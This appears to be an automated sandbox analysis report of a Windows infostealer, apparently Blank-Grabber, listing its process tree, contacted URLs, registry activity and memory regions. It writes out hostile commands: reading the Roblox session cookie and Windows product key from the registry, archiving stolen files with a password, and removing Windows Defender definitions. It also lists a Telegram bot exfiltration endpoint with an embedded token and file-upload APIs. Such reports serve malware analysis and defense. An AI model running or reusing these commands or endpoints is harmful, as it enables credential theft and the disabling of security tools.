ACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.cmdline"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "getmac"
|
||
C:\Windows\System32\getmac.exe
|
getmac
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "tree /A /F"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com
-Name .ROBLOSECURITY"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip"
*"
|
||
C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe
|
C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe a -r -hp"adrik123adi" "C:\Users\user\AppData\Local\Temp\QzNtG.zip" *
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment'
-Name PROCESSOR_IDENTIFIER"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
|
||
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform'
-Name BackupProductKeyDefault"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name
BackupProductKeyDefault
|
||
C:\Program Files\Windows Defender\MpCmdRun.exe
|
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\wbem\WMIC.exe
|
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\tasklist.exe
|
tasklist /FO LIST
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6756.tmp"
"c:\Users\user\AppData\Local\Temp\xuxqeuoy\CSC1B8650382DAF4CDABC63EC72E90C84.TMP"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\tree.com
|
tree /A /F
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic os get Caption
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic computersystem get totalphysicalmemory
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic csproduct get uuid
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\wbem\WMIC.exe
|
wmic path win32_VideoController get name
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 76 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
https://github.com/Blank-c/BlankOBF
|
unknown
|
||
https://www.avito.ru/
|
unknown
|
||
https://duckduckgo.com/ac/?q=
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
http://crl.microsoft
|
unknown
|
||
https://www.ctrip.com/
|
unknown
|
||
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
|
unknown
|
||
https://www.leboncoin.fr/
|
unknown
|
||
https://tools.ietf.org/html/rfc2388#section-4.4
|
unknown
|
||
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2920px
|
unknown
|
||
https://weibo.com/
|
unknown
|
||
https://api.anonfiles.com/upload
|
unknown
|
||
https://www.msn.com
|
unknown
|
||
http://www.microsoftILEEX~1.LNKy./
|
unknown
|
||
https://nuget.org/nuget.exe
|
unknown
|
||
https://discord.com/api/v9/users/
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
|
unknown
|
||
http://cacerts.digi
|
unknown
|
||
http://www.microsoftISPLA~1.PNGy.
|
unknown
|
||
https://peps.python.org/pep-0205/
|
unknown
|
||
https://www.reddit.com/
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://www.amazon.ca/
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
|
unknown
|
||
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
|
unknown
|
||
https://www.ebay.co.uk/
|
unknown
|
||
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
https://www.ebay.de/
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
https://go.micro
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
|
unknown
|
||
https://www.amazon.com/
|
unknown
|
||
https://github.com/python/cpython/issues/86361.
|
unknown
|
||
https://contoso.com/Icon
|
unknown
|
||
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
https://httpbin.org/
|
unknown
|
||
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
|
unknown
|
||
https://www.ecosia.org/newtab/
|
unknown
|
||
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
|
unknown
|
||
https://www.youtube.com/
|
unknown
|
||
https://allegro.pl/
|
unknown
|
||
https://github.com/Pester/Pester
|
unknown
|
||
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
|
unknown
|
||
http://www.microsoftRUSTT~2JSOy./
|
unknown
|
||
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
|
unknown
|
||
https://MD8.mozilla.org/1/m
|
unknown
|
||
https://www.python.org/psf/license/
|
unknown
|
||
https://www.bbc.co.uk/
|
unknown
|
||
http://ip-api.com/line/?fields=hostingr
|
unknown
|
||
https://bugzilla.mo
|
unknown
|
||
http://tools.ietf.org/html/rfc6125#section-6.4.3
|
unknown
|
||
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
|
unknown
|
||
https://google.com/mail
|
unknown
|
||
https://www.python.org/psf/license/)
|
unknown
|
||
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
|
unknown
|
||
https://www.google.com/
|
unknown
|
||
https://www.iqiyi.com/
|
unknown
|
||
https://foss.heptapod.net/pypy/pypy/-/issues/3539
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
|
unknown
|
||
http://google.com/
|
unknown
|
||
http://ocsp.sectigo.com0
|
unknown
|
||
https://tools.ietf.org/html/rfc7231#section-4.3.6)
|
unknown
|
||
https://www.python.org/download/releases/2.3/mro/.
|
unknown
|
||
https://contoso.com/License
|
unknown
|
||
https://discordapp.com/api/v9/users/
|
unknown
|
||
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
https://github.com/urllib3/urllib3/issues/2920
|
unknown
|
||
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
|
unknown
|
||
https://yahoo.com/
|
unknown
|
||
https://www.mozilla.oL
|
unknown
|
||
https://account.bellmedia.c
|
unknown
|
||
http://ocsp.sectigo
|
unknown
|
||
http://crl.0
|
unknown
|
||
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
|
unknown
|
||
https://login.microsoftonline.com
|
unknown
|
||
https://go.micros
|
unknown
|
||
http://cacerts.digicert.co
|
unknown
|
||
http://crl.thawte.com/ThawteTimestampingCA.crl0
|
unknown
|
||
https://html.spec.whatwg.org/multipage/
|
unknown
|
||
https://www.ifeng.com/
|
unknown
|
||
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
|
unknown
|
||
https://www.zhihu.com/
|
unknown
|
||
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
https://contoso.com/
|
unknown
|
||
https://oneget.orgX
|
unknown
|
||
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png0
|
unknown
|
||
https://api.gofile.io/getServer
|
unknown
|
||
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
|
unknown
|
||
http://nuget.org/NuGet.exe
|
unknown
|
||
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
https://sectigo.com/CPS0
|
unknown
|
||
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
https://www.amazon.co.uk/
|
unknown
|
||
http://ocsp.thawte.com0
|
unknown
|
||
https://json.org
|
unknown
|
||
https://api.telegram.org/bot6932251862:AAHJgssLa4FQxIPJOSZL101THMOx2PWVwSE/sendDocument
|
149.154.167.220
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
api.telegram.org
|
149.154.167.220
|
||
ip-api.com
|
208.95.112.1
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
208.95.112.1
|
ip-api.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Multimedia\DrawDib
|
1280x1024x32(BGR 0)
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4387
|
||
HKEY_CURRENT_USER_Classes\Local Settings\MuiCache\1e\417C44EB
|
@%SystemRoot%\system32\mlang.dll,-4407
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
28C87B86000
|
heap
|
page read and write
|
||
28C87B63000
|
heap
|
page read and write
|
||
1CCD86C8000
|
heap
|
page read and write
|
||
28C87D18000
|
heap
|
page read and write
|
||
28C87930000
|
direct allocation
|
page read and write
|
||
28C87B77000
|
heap
|
page read and write
|
||
1CCD86C6000
|
heap
|
page read and write
|
||
28C88DA0000
|
heap
|
page read and write
|
||
28C87B85000
|
heap
|
page read and write
|
||
28C87B76000
|
heap
|
page read and write
|
||
28C87D95000
|
heap
|
page read and write
|
||
28C873C5000
|
heap
|
page read and write
|
||
1BC8A8B7000
|
heap
|
page read and write
|
||
28C877E5000
|
heap
|
page read and write
|
||
1E1A0647000
|
heap
|
page read and write
|
||
18D018C1000
|
heap
|
page read and write
|
||
38F00FF000
|
unkown
|
page read and write
|
||
1E1A0654000
|
heap
|
page read and write
|
||
28E2CE39000
|
heap
|
page read and write
|
||
28C87D12000
|
heap
|
page read and write
|
||
28C87DAA000
|
heap
|
page read and write
|
||
1E1A0034000
|
heap
|
page read and write
|
||
1BC8A8C6000
|
heap
|
page read and write
|
||
28C87800000
|
heap
|
page read and write
|
||
1CCD86D0000
|
heap
|
page read and write
|
||
28C87E70000
|
direct allocation
|
page read and write
|
||
17342283000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C87D8B000
|
heap
|
page read and write
|
||
28E2D482000
|
heap
|
page read and write
|
||
1733EFCE000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
1AC9F685000
|
heap
|
page read and write
|
||
21D4D9D0000
|
heap
|
page read and write
|
||
1436F9BD000
|
heap
|
page read and write
|
||
28C877A5000
|
heap
|
page read and write
|
||
1733EF7A000
|
heap
|
page read and write
|
||
266C3ED0000
|
heap
|
page read and write
|
||
7FF8479B0000
|
trusted library allocation
|
page read and write
|
||
28FE1241000
|
heap
|
page read and write
|
||
7FF847980000
|
trusted library allocation
|
page read and write
|
||
28C872E0000
|
heap
|
page read and write
|
||
15373790000
|
heap
|
page read and write
|
||
1436D9E1000
|
heap
|
page read and write
|
||
8FA43FF000
|
stack
|
page read and write
|
||
23315587000
|
heap
|
page read and write
|
||
28C88CDD000
|
heap
|
page read and write
|
||
28C88832000
|
heap
|
page read and write
|
||
28C88278000
|
direct allocation
|
page read and write
|
||
28C8732E000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
28C88B90000
|
heap
|
page read and write
|
||
288218E000
|
stack
|
page read and write
|
||
28C87D6C000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C877C9000
|
heap
|
page read and write
|
||
14B35500000
|
heap
|
page read and write
|
||
1E19FFCA000
|
heap
|
page read and write
|
||
1733EFCE000
|
heap
|
page read and write
|
||
D6C9B9B000
|
stack
|
page read and write
|
||
28C88A0A000
|
heap
|
page read and write
|
||
28C87C2C000
|
heap
|
page read and write
|
||
20D5DE10000
|
heap
|
page read and write
|
||
28C8771F000
|
heap
|
page read and write
|
||
241A8835000
|
heap
|
page read and write
|
||
28C87D8A000
|
heap
|
page read and write
|
||
28E2CFB5000
|
heap
|
page read and write
|
||
7FF8B8F94000
|
unkown
|
page execute and read and write
|
||
1537161B000
|
heap
|
page read and write
|
||
1618354F000
|
trusted library allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
9CB01FF000
|
unkown
|
page read and write
|
||
28C87333000
|
heap
|
page read and write
|
||
28C87C77000
|
heap
|
page read and write
|
||
153716B0000
|
heap
|
page read and write
|
||
28C87C20000
|
heap
|
page read and write
|
||
1436E11C000
|
heap
|
page read and write
|
||
7FF73AE10000
|
unkown
|
page readonly
|
||
28C87D91000
|
heap
|
page read and write
|
||
1619A222000
|
heap
|
page read and write
|
||
25CAEB40000
|
heap
|
page read and write
|
||
1BC8A893000
|
heap
|
page read and write
|
||
1436E100000
|
heap
|
page read and write
|
||
18EBB804000
|
heap
|
page read and write
|
||
1F23A8A0000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
18EBB0A7000
|
heap
|
page read and write
|
||
1E1A0660000
|
heap
|
page read and write
|
||
28E2ED11000
|
heap
|
page read and write
|
||
28E2CE45000
|
heap
|
page read and write
|
||
28E2CE4C000
|
heap
|
page read and write
|
||
28C876DF000
|
heap
|
page read and write
|
||
16180130000
|
heap
|
page read and write
|
||
14B35A9E000
|
heap
|
page read and write
|
||
15373785000
|
heap
|
page read and write
|
||
7FF8479F0000
|
trusted library allocation
|
page read and write
|
||
28C87C68000
|
heap
|
page read and write
|
||
2BAD9A00000
|
heap
|
page read and write
|
||
1F23A740000
|
heap
|
page read and write
|
||
7FF847990000
|
trusted library allocation
|
page read and write
|
||
28C8876F000
|
heap
|
page read and write
|
||
1733EF51000
|
heap
|
page read and write
|
||
16183190000
|
trusted library allocation
|
page read and write
|
||
1BC8A89E000
|
heap
|
page read and write
|
||
28C87336000
|
heap
|
page read and write
|
||
1E19FFC4000
|
heap
|
page read and write
|
||
28E2CFED000
|
heap
|
page read and write
|
||
2720DB31000
|
heap
|
page read and write
|
||
25CAEB58000
|
heap
|
page read and write
|
||
7FF7F7F2E000
|
unkown
|
page readonly
|
||
1EE13770000
|
heap
|
page read and write
|
||
1E1A0669000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
1436E135000
|
heap
|
page read and write
|
||
173422B2000
|
heap
|
page read and write
|
||
28B63517000
|
heap
|
page read and write
|
||
15300001000
|
trusted library allocation
|
page read and write
|
||
1733EEF5000
|
heap
|
page read and write
|
||
7FF8479C0000
|
trusted library allocation
|
page read and write
|
||
1AC9F698000
|
heap
|
page read and write
|
||
7FF8A9393000
|
unkown
|
page execute and read and write
|
||
173422B8000
|
heap
|
page read and write
|
||
14B35ABA000
|
heap
|
page read and write
|
||
16183183000
|
trusted library allocation
|
page read and write
|
||
28B63300000
|
heap
|
page read and write
|
||
2BAD99E0000
|
heap
|
page read and write
|
||
28C87D37000
|
heap
|
page read and write
|
||
1E1A0052000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28C87352000
|
heap
|
page read and write
|
||
1436F9BD000
|
heap
|
page read and write
|
||
28C88AAD000
|
heap
|
page read and write
|
||
1CCD86D1000
|
heap
|
page read and write
|
||
246E4F70000
|
heap
|
page read and write
|
||
18D018AA000
|
heap
|
page read and write
|
||
1436DA07000
|
heap
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2CE3D000
|
heap
|
page read and write
|
||
2880DCF000
|
stack
|
page read and write
|
||
28C88B49000
|
heap
|
page read and write
|
||
1436D9FC000
|
heap
|
page read and write
|
||
2881379000
|
stack
|
page read and write
|
||
28E2CEC4000
|
heap
|
page read and write
|
||
28C88A35000
|
heap
|
page read and write
|
||
28C87B5F000
|
heap
|
page read and write
|
||
95867FF000
|
unkown
|
page read and write
|
||
28C8879D000
|
heap
|
page read and write
|
||
28C88B51000
|
heap
|
page read and write
|
||
28C87C2E000
|
heap
|
page read and write
|
||
28C88B5F000
|
heap
|
page read and write
|
||
28B63325000
|
heap
|
page read and write
|
||
27258AF0000
|
heap
|
page read and write
|
||
28C87D8E000
|
heap
|
page read and write
|
||
28E2CE76000
|
heap
|
page read and write
|
||
28C88B85000
|
heap
|
page read and write
|
||
1734229A000
|
heap
|
page read and write
|
||
28E2CEBC000
|
heap
|
page read and write
|
||
2545B480000
|
heap
|
page read and write
|
||
14B353D0000
|
heap
|
page read and write
|
||
28C87D78000
|
heap
|
page read and write
|
||
14B35512000
|
heap
|
page read and write
|
||
28C87CD7000
|
heap
|
page read and write
|
||
28C876B9000
|
heap
|
page read and write
|
||
7FF8A883A000
|
unkown
|
page execute and read and write
|
||
182DF820000
|
heap
|
page read and write
|
||
1E1A0052000
|
heap
|
page read and write
|
||
14B35512000
|
heap
|
page read and write
|
||
1E1A0032000
|
heap
|
page read and write
|
||
28E2CE19000
|
heap
|
page read and write
|
||
1BD20130000
|
heap
|
page read and write
|
||
B51377B000
|
stack
|
page read and write
|
||
173422D4000
|
heap
|
page read and write
|
||
28FE1237000
|
heap
|
page read and write
|
||
D0F7BFF000
|
stack
|
page read and write
|
||
1436D9E7000
|
heap
|
page read and write
|
||
7FF8B8CBE000
|
unkown
|
page execute and read and write
|
||
1733EF13000
|
heap
|
page read and write
|
||
28C87339000
|
heap
|
page read and write
|
||
1436D9E3000
|
heap
|
page read and write
|
||
1F23C1D0000
|
direct allocation
|
page read and write
|
||
18A64C21000
|
heap
|
page read and write
|
||
7FF7F7F26000
|
unkown
|
page read and write
|
||
28C88906000
|
heap
|
page read and write
|
||
28C87B06000
|
heap
|
page read and write
|
||
1F23A7C9000
|
heap
|
page read and write
|
||
28E2CFBA000
|
heap
|
page read and write
|
||
28C87B77000
|
heap
|
page read and write
|
||
173422EC000
|
heap
|
page read and write
|
||
7DF4C2E00000
|
trusted library allocation
|
page execute and read and write
|
||
28C88794000
|
heap
|
page read and write
|
||
1436E133000
|
heap
|
page read and write
|
||
18EBB7F0000
|
heap
|
page read and write
|
||
7FF8A8D65000
|
unkown
|
page execute and read and write
|
||
1F23A74A000
|
heap
|
page read and write
|
||
28E2CEAA000
|
heap
|
page read and write
|
||
28C87DD0000
|
heap
|
page read and write
|
||
182DF960000
|
heap
|
page read and write
|
||
28C87D95000
|
heap
|
page read and write
|
||
1733EED8000
|
heap
|
page read and write
|
||
20D5E070000
|
heap
|
page read and write
|
||
28C88AF5000
|
heap
|
page read and write
|
||
1EE13965000
|
heap
|
page read and write
|
||
266C4080000
|
heap
|
page read and write
|
||
28C8767A000
|
heap
|
page read and write
|
||
28E2D49F000
|
heap
|
page read and write
|
||
28C88A28000
|
heap
|
page read and write
|
||
1F23DD3D000
|
direct allocation
|
page read and write
|
||
98A0BFF000
|
stack
|
page read and write
|
||
1E1A0672000
|
heap
|
page read and write
|
||
28C88B85000
|
heap
|
page read and write
|
||
28C87CC8000
|
heap
|
page read and write
|
||
28C8766D000
|
heap
|
page read and write
|
||
1A96E3A0000
|
heap
|
page read and write
|
||
1E1A0046000
|
heap
|
page read and write
|
||
28C8774D000
|
heap
|
page read and write
|
||
234DABA0000
|
heap
|
page read and write
|
||
1EE628C0000
|
heap
|
page read and write
|
||
28E2CFEE000
|
heap
|
page read and write
|
||
28C87D8B000
|
heap
|
page read and write
|
||
1436D9E7000
|
heap
|
page read and write
|
||
15373780000
|
heap
|
page read and write
|
||
32E138B000
|
stack
|
page read and write
|
||
28C87DA2000
|
heap
|
page read and write
|
||
12F9F68000
|
stack
|
page read and write
|
||
6768A7F000
|
stack
|
page read and write
|
||
28C88BB5000
|
heap
|
page read and write
|
||
28C88B49000
|
heap
|
page read and write
|
||
1E19FFCE000
|
heap
|
page read and write
|
||
28C88294000
|
direct allocation
|
page read and write
|
||
7FF84769D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8B9092000
|
unkown
|
page execute and write copy
|
||
1734222C000
|
heap
|
page read and write
|
||
28C88640000
|
direct allocation
|
page read and write
|
||
28C87DA8000
|
heap
|
page read and write
|
||
7FF8479E0000
|
trusted library allocation
|
page read and write
|
||
2720DB21000
|
heap
|
page read and write
|
||
28C87CB0000
|
heap
|
page read and write
|
||
28C87CB8000
|
heap
|
page read and write
|
||
1EE13670000
|
heap
|
page read and write
|
||
234DABC0000
|
heap
|
page read and write
|
||
18EBD0B6000
|
heap
|
page read and write
|
||
28C89910000
|
direct allocation
|
page read and write
|
||
1436F9C4000
|
heap
|
page read and write
|
||
14B35529000
|
heap
|
page read and write
|
||
1F23DBB0000
|
direct allocation
|
page read and write
|
||
1CCD86C4000
|
heap
|
page read and write
|
||
28E2ED24000
|
heap
|
page read and write
|
||
28C876A9000
|
heap
|
page read and write
|
||
7FF8478F0000
|
trusted library allocation
|
page read and write
|
||
2D0F8FF000
|
stack
|
page read and write
|
||
28C87D1F000
|
heap
|
page read and write
|
||
28C87703000
|
heap
|
page read and write
|
||
2545B320000
|
heap
|
page read and write
|
||
1A6A1420000
|
heap
|
page read and write
|
||
2238CFC0000
|
heap
|
page read and write
|
||
1BC8A89E000
|
heap
|
page read and write
|
||
1733EFBF000
|
heap
|
page read and write
|
||
1733EF18000
|
heap
|
page read and write
|
||
16180320000
|
heap
|
page read and write
|
||
28C87DF0000
|
heap
|
page read and write
|
||
1436DA07000
|
heap
|
page read and write
|
||
27258A00000
|
heap
|
page read and write
|
||
1429BA3B000
|
heap
|
page read and write
|
||
153714A0000
|
heap
|
page read and write
|
||
1436DA03000
|
heap
|
page read and write
|
||
7FF8476BB000
|
trusted library allocation
|
page read and write
|
||
